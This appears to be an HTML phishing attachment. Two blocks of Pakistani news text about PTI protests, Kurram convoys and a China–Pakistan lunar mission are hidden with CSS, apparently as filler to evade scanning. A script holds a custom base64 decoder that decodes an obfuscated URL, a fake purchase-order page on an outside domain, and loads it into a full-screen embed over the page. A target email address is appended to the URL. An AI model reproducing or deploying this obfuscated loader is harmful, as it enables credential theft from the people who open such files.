<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title></title>
<style>
    .gege{
        display: none;
    }
</style>
</head>
<body>
    <p class="gege">, Pakistan Tehreek-e-Insaf (PTI) spokesperson reiterated that peaceful protest was a fundamental right enshrined in the constitution, 
        
        and the nation remained resolute in exercising this right despite the incumbent government’s incessant threats, intimidation, and attempts to convert the country into a war zone through massive troop deployments and containerization.

PTI Spokesperson, in a reaction to Atta Tarar’s outbursts, stated that the touts and the courtiers unleashed to target and intimidate people for participating in the revolutionary PTI’s peaceful march should bear in mind that 240 million people were fed-up of their self-centred and incompetent masters, 


who ruined the country economically, socially and politically during the past two and a half years.

He lashed out at the mandate thief government for taking away the people’s fundamental rights, including freedom of movement, trade, employment and communication, besides confining 240 million people to their homes.


PTI Spokesperson strongly condemned the government’s open threats and intimidation tactics against young people, traders, teachers, students, transporters and government officials.



He emphasized that the nation would not be intimidated by threats and would not give up its fundamental rights and the peaceful protest would be the prelude to restore the constitution and the law in its true sense.



PTI Spokesperson made it clear that the undeterred and unfazed nation would come out in large number peacefully from across the country for achieving true freedom in total disregard of the threats hurled by the touts and added that the government would be responsible for the riots and anarchy.



A convoy of 225 vehicles, carrying much-needed food supplies, essential goods, and petroleum products, has successfully reached Parachinar.



Meanwhile, the process of demolishing bunkers and removing associated trenches continues under the peace agreement in Kurram. Official sources say that 272 bunkers have been demolished so far.



As part of the peace agreement, the process of collecting weapons and arms gradually by the state has also begun, and over 100 miscreants have been taken into custody so far.


        
        </p>
         <embed id="kpk" src="#" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></embed>

<script>
    (function() {
        
        const getValue = (char) => {
            const code = char.charCodeAt(0);
            if (code >= 65 && code <= 90) return code - 65;         
            if (code >= 97 && code <= 122) return code - 71;        
            if (code >= 48 && code <= 57) return code + 4;          
            if (char === '+') return 62;                           
            if (char === '/') return 63;                           
            return -1;                                              
        };

        
        const assemble = (a, b, c, d) => {
            return (a << 18) | (b << 12) | (c << 6) | d;
        };

        
        const extract = (num) => [
            String.fromCharCode((num >> 16) & 0xff),
            String.fromCharCode((num >> 8) & 0xff),
            String.fromCharCode(num & 0xff)
        ];

        
        const transform = (input) => {
            let output = '';

            
            const sanitized = input.replace(/[^A-Za-z0-9+/]/g, '');

            
            const processBlock = (i) => {
                const values = [
                    getValue(sanitized.charAt(i)),
                    getValue(sanitized.charAt(i + 1)),
                    getValue(sanitized.charAt(i + 2)),
                    getValue(sanitized.charAt(i + 3))
                ];

                const merged = assemble(...values);
                const [char1, char2, char3] = extract(merged);

                if (values[2] === -1) return char1;  
                if (values[3] === -1) return char1 + char2;
                return char1 + char2 + char3;
            };

            for (let i = 0; i < sanitized.length; i += 4) {
                output += processBlock(i);
            }

            
            const trim = (text) => {
                while (text.endsWith('\0')) {
                    text = text.slice(0, -1);
                }
                return text;
            };

            return trim(output);
        };

        
        const encodedData = "aHR0cHM6Ly9qYXBleHRyYWRpbmdpbmMuY29tL0dQRC9vcmRlci9QTy1BUzIwMjUwMzI5MS5odG1s"; 
        const finalResult = transform(encodedData); 

       
        document.getElementById("kpk").src = finalResult + "#pkg-gtkpod-devel@lists.alioth.debian.org";
    })();
</script>






   <p class="gege"> Previously a, convoy of 130 vehicles, including five oil tankers, was ambushed by unidentified armed assailants in Kurram district on Monday. 
   
   
   The convoy, which was traveling from Tall to Parachinar, came under attack near Char Khel in Lower Kurram.
   
   The attackers opened fire on the convoy, halting the vehicles and looting supplies, including a truck carrying medicines. Police sources confirmed that Akram Khan, a driver from Peshawar, 
   
   
   was injured in the incident and was transferred to Ali Zai Hospital for treatment.

Lin emphasised that Pakistan’s involvement in this initiative will foster knowledge exchange and cooperation, aligning with the broader goal of peaceful space exploration for the benefit of humanity.

A major milestone in this partnership was achieved last year when China launched Pakistan’s first lunar satellite, CubeSat, as part of its historic Chang’e 6 mission. 



The satellite successfully entered the Moon’s orbit, marking Pakistan’s first-ever lunar flyby.

“In an era of increasing geopolitical competition, China is positioning itself as a leader in space exploration, particularly among Global South nations,” said Carlo Iorio, Director of the Center for Research and Engineering in Space Technology at the Free University of Brussels

    </p>
</body>
</html>